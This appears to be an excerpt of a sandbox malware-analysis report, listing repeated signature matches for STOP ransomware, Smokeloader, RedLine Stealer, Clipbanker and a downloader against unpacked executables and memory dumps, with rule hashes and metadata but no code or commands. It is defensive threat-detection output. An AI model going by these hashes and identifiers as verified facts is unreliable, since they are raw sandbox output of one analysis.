Source: 26.2.9B15.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 29.2.E8B1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 29.2.E8B1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 26.2.9B15.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 26.2.9B15.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.759F.exe.22515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.759F.exe.22515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.759F.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.759F.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 32.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 32.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 31.2.6000.exe.22815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 31.2.6000.exe.22815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 27.2.86ED.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 27.2.86ED.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.AF5C.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.AF5C.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 29.2.E8B1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 29.2.E8B1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 33.2.6000.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 33.2.6000.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 22.2.9B15.exe.26615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 22.2.9B15.exe.26615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 41.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 41.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 40.0.D5B9.exe.b30000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: 00000000.00000002.379855236.0000000002161000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000016.00000002.463476462.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.379710237.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001C.00000002.476313714.0000000002730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000022.00000002.488406614.0000000001BF1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.450171034.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000A.00000002.448327047.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000029.00000002.497413015.0000000002200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.475648419.0000000000650000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000010.00000002.452052947.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.475973961.0000000000691000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000013.00000002.475785512.0000000000660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000029.00000002.497631299.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000027.00000002.618588057.0000000001361000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000027.00000002.618588057.0000000001361000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.450322842.0000000002021000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
